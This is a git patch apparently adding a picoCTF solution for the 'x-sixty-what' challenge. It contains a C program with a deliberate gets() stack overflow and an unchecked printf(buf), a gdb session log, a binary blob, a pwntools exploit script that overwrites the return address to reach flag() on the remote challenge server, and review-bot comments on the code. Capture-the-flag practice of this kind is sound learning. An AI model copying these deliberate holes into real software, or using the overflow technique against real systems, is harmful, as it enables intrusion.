From fe67eec9c36edc3273f9feb1f5691d6c097fd036 Mon Sep 17 00:00:00 2001
From: THEON-1
Date: Mon, 8 Dec 2025 13:36:09 +0100
Subject: [PATCH] x-sixty-what
---
x-sixty-what/.gdb_history | 25 +++++++++++++++++++++++++
x-sixty-what/sol.py | 19 +++++++++++++++++++
x-sixty-what/vuln | Bin 0 -> 17128 bytes
x-sixty-what/vuln.c | 37 +++++++++++++++++++++++++++++++++++++
4 files changed, 81 insertions(+)
create mode 100644 x-sixty-what/.gdb_history
create mode 100755 x-sixty-what/sol.py
create mode 100755 x-sixty-what/vuln
create mode 100644 x-sixty-what/vuln.c
diff --git a/x-sixty-what/.gdb_history b/x-sixty-what/.gdb_history
new file mode 100644
index 0000000..81b5ded
--- /dev/null
+++ b/x-sixty-what/.gdb_history
@@ -0,0 +1,25 @@
+show vuln
+list vuln
+b vuln
+exit
+info functions
+list main
+disassemble main
+disasm main
+disassemble main
+disassemble *main
+b vuln
+exit
+disassemble main
+disassemble vuln
+b vuln+2
+b *vuln+2
+exit
+disassemble vuln
+b *vuln+24
+run
+stackf
+nexti
+stackf
+disassemble flag
+exit
diff --git a/x-sixty-what/sol.py b/x-sixty-what/sol.py
new file mode 100755
index 0000000..2fc31e6
--- /dev/null
+++ b/x-sixty-what/sol.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_base = 0x7fffffffcf70
+ret_addr = 0x7fffffffcfb8
+ret_offset = ret_addr - buffer_base
+flag_fun_addr = 0x0000000000401236
+flag_fun_offset = 5
+target_addr = flag_fun_addr + flag_fun_offset
+
+send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
+
+#conn = process("./vuln")
+conn = remote('saturn.picoctf.net', 60832)
+
+conn.recvline()
+conn.sendline(send_buffer)
+conn.interactive()
+
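Review bot: `.gdb_history` is a per-user debugger session log rather than project source, and this commit adds it together with a prebuilt 17128-byte `vuln` binary, so local artifacts end up under version control. The binary cannot be checked against `vuln.c` from the diff alone. Consider dropping the history file from the commit and adding `.gdb_history` to `.gitignore`; if the binary has to ship, recording its checksum and the build command in the commit message would let others confirm what they are running.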
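Review bot: `buffer_base` and `ret_addr` are absolute stack addresses taken from one local debugging session, yet nothing in the hunk says that only their difference is used and that the values themselves are not stable across runs or hosts. A comment above them, for example `# stack addresses observed in gdb on the local build; only ret_addr - buffer_base matters`, would stop a reader treating them as constants of the binary, and `flag_fun_offset = 5` needs a similar one-line reason. The endpoint `remote('saturn.picoctf.net', 60832)` is hard-coded beside a commented-out `process("./vuln")`, so changing targets means editing the script; reading host and port from the command line would be tidier.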
diff --git a/x-sixty-what/vuln b/x-sixty-what/vuln new file mode 100755 index 0000000000000000000000000000000000000000..4f16c682402bb9c5118d12336017934cba3223eb GIT binary patch literal 17128 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
+#include
+#include
+#include
+#include
+#include
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFFSIZE];
+ gets(buf);
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+ vuln();
+ return 0;
+}
+
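Review bot: In `flag()`, `printf(buf);` passes the contents of flag.txt as the format string, so any `%` in the file is interpreted as a conversion; `fputs(buf, stdout);` or `printf("%s", buf);` prints it literally. The same function ignores the return value of `fgets`, which leaves `buf` uninitialised when the file is empty or unreadable, and it never calls `fclose(f)`. `gets(buf)` in `vuln()` writes without any bound into the 64-byte `buf` and was removed from the standard library in C11; judging by the file name and the accompanying sol.py this overflow is presumably the intended exercise, so it should carry a comment such as `/* intentionally unbounded: this is the exercise, do not reuse */` rather than read like ordinary code. In `main()`, the result of `setresgid(gid, gid, gid)` is not checked.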